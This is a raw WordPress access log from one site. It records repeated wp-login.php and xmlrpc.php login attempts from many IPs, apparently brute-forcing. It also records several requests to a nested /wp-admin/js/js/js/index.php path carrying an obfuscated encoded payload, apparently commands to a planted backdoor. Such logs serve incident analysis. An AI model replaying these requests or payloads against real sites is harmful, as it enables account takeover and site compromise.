114.8.199.224 - - [20/Oct/2025:10:13:43 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0"
57.130.20.252 - - [20/Oct/2025:10:13:43 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:13:45 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
57.130.20.252 - - [20/Oct/2025:10:13:45 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:13:47 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:13:48 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:11:22 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333038322p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393438322q3433323836616436303433336534353062336362656666313638653666666432222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
178.33.109.195 - - [20/Oct/2025:10:13:49 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:13:49 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
178.33.109.195 - - [20/Oct/2025:10:13:49 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:13:50 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
51.38.53.154 - - [20/Oct/2025:10:13:51 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:13:51 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
51.38.53.154 - - [20/Oct/2025:10:13:51 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:13:52 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:13:54 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:13:55 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.249.64.232 - - [20/Oct/2025:10:13:54 -0400] "GET /?b=720189414463890e HTTP/2.0" 200 193181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:13:57 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:13:58 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:01 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:02 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:03 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:04 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:05 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:07 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
38.92.48.38 - - [20/Oct/2025:10:14:08 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)"
193.142.147.5 - - [20/Oct/2025:10:14:08 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:09 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:09 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.249.73.64 - - [20/Oct/2025:10:14:08 -0400] "GET /?47491238?entity=0047426274 HTTP/2.0" 200 189303 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
38.92.48.38 - - [20/Oct/2025:10:14:10 -0400] "POST /wp-login.php HTTP/2.0" 200 7145 "https://hindi.blushin.com/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)"
66.116.199.115 - - [20/Oct/2025:10:11:44 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333130342p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393530342q6164356434613235323734663330643237346364326165653132353166656531222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
193.142.147.5 - - [20/Oct/2025:10:14:11 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:12 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:14 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:15 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
188.164.198.78 - - [20/Oct/2025:10:14:16 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.153.42.48 - - [20/Oct/2025:10:14:17 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:17 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
103.153.42.48 - - [20/Oct/2025:10:14:18 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
188.164.198.78 - - [20/Oct/2025:10:14:20 -0400] "POST /wp-login.php HTTP/2.0" 200 7093 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:20 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:21 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:22 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:23 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
159.65.61.232 - - [20/Oct/2025:10:14:25 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:25 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:26 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
159.65.61.232 - - [20/Oct/2025:10:14:26 -0400] "POST /wp-login.php HTTP/2.0" 200 7090 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:27 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
51.38.53.154 - - [20/Oct/2025:10:14:27 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.38.53.154 - - [20/Oct/2025:10:14:29 -0400] "POST /wp-login.php HTTP/2.0" 200 7093 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:29 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:29 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
114.119.145.88 - - [20/Oct/2025:10:14:29 -0400] "GET /10-bollywood-heroines-who-chose-to-be-the-actors-instead/bollywood-heroines-1/ HTTP/2.0" 200 150593 "https://hindi.blushin.com/attachment-sitemap13.xml" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.191.171.13 - - [20/Oct/2025:10:14:29 -0400] "GET /tag/eating-lunch-with-your-child-at-school/ HTTP/2.0" 200 149848 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:14:31 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:12:06 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333132362p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393532362q6563383262646138663163663938313432633832653433346632656662343464222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
185.194.216.152 - - [20/Oct/2025:10:14:33 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:33 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
185.194.216.152 - - [20/Oct/2025:10:14:35 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:35 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:37 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:14:39 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
198.20.104.194 - - [20/Oct/2025:10:14:39 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.38.53.154 - - [20/Oct/2025:10:14:42 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:42 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
198.20.104.194 - - [20/Oct/2025:10:14:43 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:44 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
51.38.53.154 - - [20/Oct/2025:10:14:44 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:45 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
51.38.53.154 - - [20/Oct/2025:10:14:47 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:47 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
5.9.16.93 - - [20/Oct/2025:10:14:47 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.191.171.14 - - [20/Oct/2025:10:14:46 -0400] "GET /tag/side-effects-of-eating-raw-garlic-in-empty-stomach/ HTTP/2.0" 200 150146 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
51.38.53.154 - - [20/Oct/2025:10:14:47 -0400] "POST /wp-login.php HTTP/2.0" 200 7089 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
5.9.16.93 - - [20/Oct/2025:10:14:48 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:49 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
54.37.96.153 - - [20/Oct/2025:10:14:49 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.239.147.118 - - [20/Oct/2025:10:14:49 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:50 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
54.37.96.153 - - [20/Oct/2025:10:14:50 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.239.147.118 - - [20/Oct/2025:10:14:50 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:14:51 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
2a03:2880:f800:9:: - - [20/Oct/2025:10:14:50 -0400] "GET /tag/tips-to-get-pregnant-with-pcos/ HTTP/2.0" 200 149497 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
193.142.147.5 - - [20/Oct/2025:10:14:53 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
46.43.66.202 - - [20/Oct/2025:10:14:53 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
46.43.66.202 - - [20/Oct/2025:10:14:54 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:10:12:28 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333134382p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393534382q3131633161333864373366313363343230353965393963383634353564653230222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
193.142.147.5 - - [20/Oct/2025:10:14:56 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
51.38.53.154 - - [20/Oct/2025:10:14:56 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; ms-office)"
193.142.147.5 - - [20/Oct/2025:10:14:57 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
85.208.96.194 - - [20/Oct/2025:10:14:57 -0400] "GET /tag/forehead-hair-removal-home-remedies/ HTTP/2.0" 200 149846 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:14:59 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
184.168.127.229 - - [20/Oct/2025:10:14:59 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
184.168.127.229 - - [20/Oct/2025:10:15:00 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
